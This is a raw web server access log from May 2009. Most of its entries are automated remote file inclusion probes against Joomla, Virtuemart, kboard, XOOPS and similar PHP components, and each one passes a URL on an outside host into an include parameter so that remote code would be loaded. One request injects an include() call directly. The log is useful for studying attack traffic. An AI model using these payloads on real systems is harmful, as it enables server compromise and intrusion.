85.119.154.129 - - [30/May/2009:05:16:35 -0400] "GET /logs/access_log.Q109052200/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
209.59.12.99 - - [30/May/2009:05:16:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.18.148.82 - - [30/May/2009:05:17:33 -0400] "GET /index.php?meio=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:05:17:34 -0400] "GET /logs/index.php?meio=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
213.206.93.3 - - [30/May/2009:05:17:57 -0400] "GET /logs/access_log.Q108112300/index.php?option=com_yanc&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
213.206.93.3 - - [30/May/2009:05:17:57 -0400] "GET /index.php?option=com_yanc&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
213.206.93.3 - - [30/May/2009:05:17:58 -0400] "GET /logs/index.php?option=com_yanc&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
89.223.3.98 - - [30/May/2009:05:18:01 -0400] "GET /logs/access_log.Q109050300/bookmark4u/lostpasswd.php?env[include_prefix]=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:05:18:01 -0400] "GET /logs/access_log.Q109051000/bookmark4u/lostpasswd.php?env[include_prefix]=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
213.206.93.3 - - [30/May/2009:05:18:21 -0400] "GET /logs/error_log.Q108110300/index.php?option=com_yanc&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
121.0.141.241 - - [30/May/2009:05:19:02 -0400] "GET /logs/access_log.Q109051600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.damigallery.co.kr/board/data/id.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
121.0.141.241 - - [30/May/2009:05:19:03 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.damigallery.co.kr/board/data/id.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
121.0.141.241 - - [30/May/2009:05:19:03 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.damigallery.co.kr/board/data/id.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
121.0.141.241 - - [30/May/2009:05:19:07 -0400] "GET /logs/access_log.Q109051800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.damigallery.co.kr/board/data/id.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:20:17 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:20:17 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:20:17 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:20:18 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:20:18 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:20:18 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:20:19 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:20:19 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:20:20 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:20:27 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:20:27 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:20:28 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:20:28 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:20:28 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:20:28 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:20:32 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:20:32 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:20:32 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:05:20:53 -0400] "GET /home.php?pagina=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:05:20:53 -0400] "GET /logs/home.php?pagina=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:05:20:53 -0400] "GET /logs/access_log.Q109052200/home.php?pagina=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:21:05 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:21:05 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:21:05 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:21:16 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:21:18 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:21:20 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:21:22 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:21:22 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:21:22 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
75.125.245.26 - - [30/May/2009:05:21:38 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
75.125.245.26 - - [30/May/2009:05:21:38 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
75.125.245.26 - - [30/May/2009:05:21:38 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:05:21:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.18.148.82 - - [30/May/2009:05:21:50 -0400] "GET /logs/access_log.Q109052200%20%20/home.php?pagina=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:21:59 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:21:59 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:21:59 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
121.0.141.241 - - [30/May/2009:05:22:07 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.damigallery.co.kr/board/data/id.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
121.0.141.241 - - [30/May/2009:05:22:07 -0400] "GET /logs/access_log.Q109051800%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.damigallery.co.kr/board/data/id.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:22:14 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:22:14 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:05:22:14 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
221.139.104.104 - - [30/May/2009:05:22:17 -0400] "GET /logs/access_log.Q109051600/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
221.139.104.104 - - [30/May/2009:05:22:17 -0400] "GET /logs/access_log.Q109051500/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:05:22:20 -0400] "GET /logs/access_log.Q109050700/index.php?meio=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:23:00 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:23:00 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
83.143.81.26 - - [30/May/2009:05:23:00 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
75.125.245.26 - - [30/May/2009:05:23:08 -0400] "GET /logs/access_log.Q109050300%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
221.139.104.104 - - [30/May/2009:05:24:53 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
221.139.104.104 - - [30/May/2009:05:24:53 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
221.139.104.104 - - [30/May/2009:05:24:53 -0400] "GET /logs/access_log.Q109051800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
88.191.103.144 - - [30/May/2009:05:26:31 -0400] "GET /logs/access_log.Q109051000/index.php?dept=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
88.191.103.144 - - [30/May/2009:05:26:31 -0400] "GET /logs/index.php?dept=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
88.191.103.144 - - [30/May/2009:05:26:31 -0400] "GET /index.php?dept=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:05:26:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.191.103.144 - - [30/May/2009:05:26:50 -0400] "GET /logs/access_log.Q109051000%20%20/index.php?dept=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:05:27:46 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/ask_password.php?dir=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
202.165.243.233 - - [30/May/2009:05:27:47 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6)"
202.165.243.233 - - [30/May/2009:05:27:47 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6)"
85.17.162.28 - - [30/May/2009:05:27:55 -0400] "GET /logs/access_log.Q109051500/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
202.165.243.233 - - [30/May/2009:05:28:05 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6)"
202.165.243.233 - - [30/May/2009:05:28:08 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6)"
74.6.8.108 - - [30/May/2009:05:28:35 -0400] "GET /logs/error_log.Q108072500 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.234.201.88 - - [30/May/2009:05:28:59 -0400] "GET /logs/error_log.Q109050500/errors.php?error=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
77.234.201.88 - - [30/May/2009:05:28:59 -0400] "GET /errors.php?error=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
77.234.201.88 - - [30/May/2009:05:28:59 -0400] "GET /logs/errors.php?error=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
89.223.3.98 - - [30/May/2009:05:29:04 -0400] "GET /logs/access_log.Q109050300/bookmark4u/lostpasswd.php?env[include_prefix]=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:05:29:04 -0400] "GET /logs/access_log.Q109051000/bookmark4u/lostpasswd.php?env[include_prefix]=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.234.201.88 - - [30/May/2009:05:29:52 -0400] "GET /errors.php?error=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
209.59.12.99 - - [30/May/2009:05:31:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
202.75.4.169 - - [30/May/2009:05:32:22 -0400] "GET /logs/error_log.Q108110300/index.php?option=com_yanc&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
202.75.4.169 - - [30/May/2009:05:32:23 -0400] "GET /index.php?option=com_yanc&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
202.75.4.169 - - [30/May/2009:05:32:24 -0400] "GET /logs/index.php?option=com_yanc&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
221.139.104.104 - - [30/May/2009:05:32:51 -0400] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
221.139.104.104 - - [30/May/2009:05:32:51 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
221.139.104.104 - - [30/May/2009:05:32:51 -0400] "GET /logs/access_log.Q109031800/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
221.139.104.104 - - [30/May/2009:05:32:56 -0400] "GET /logs/access_log.Q108081500/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
202.75.4.169 - - [30/May/2009:05:33:38 -0400] "GET /logs/access_log.Q108112300/index.php?option=com_yanc&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
77.234.201.88 - - [30/May/2009:05:34:20 -0400] "GET /logs/error_log.Q108052600/errors.php?error=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
195.34.78.110 - - [30/May/2009:05:35:39 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
195.34.78.110 - - [30/May/2009:05:35:39 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:05:35:40 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:05:35:40 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:05:35:40 -0400] "GET /logs/access_log.Q108070500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [30/May/2009:05:35:41 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:05:35:46 -0400] "GET /logs/access_log.Q109051800%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.34.78.110 - - [30/May/2009:05:35:46 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.34.78.110 - - [30/May/2009:05:35:46 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
195.34.78.110 - - [30/May/2009:05:35:46 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
194.126.110.134 - - [30/May/2009:05:36:29 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
194.126.110.134 - - [30/May/2009:05:36:29 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
194.126.110.134 - - [30/May/2009:05:36:29 -0400] "GET /logs/access_log.Q108121900//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:05:36:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.18.148.82 - - [30/May/2009:05:37:01 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:05:37:41 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:05:37:41 -0400] "GET /logs/access_log.Q109051600%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:05:37:41 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:05:37:46 -0400] "GET /logs/access_log.Q109051800%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:05:38:33 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
84.32.195.2 - - [30/May/2009:05:38:47 -0400] "GET /?sourcedir=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
84.32.195.2 - - [30/May/2009:05:38:47 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
84.32.195.2 - - [30/May/2009:05:38:47 -0400] "GET /logs/?sourcedir=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 200 3428 "-" "Mozilla/5.0"
194.126.110.134 - - [30/May/2009:05:39:36 -0400] "GET /logs/access_log.Q108121900%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
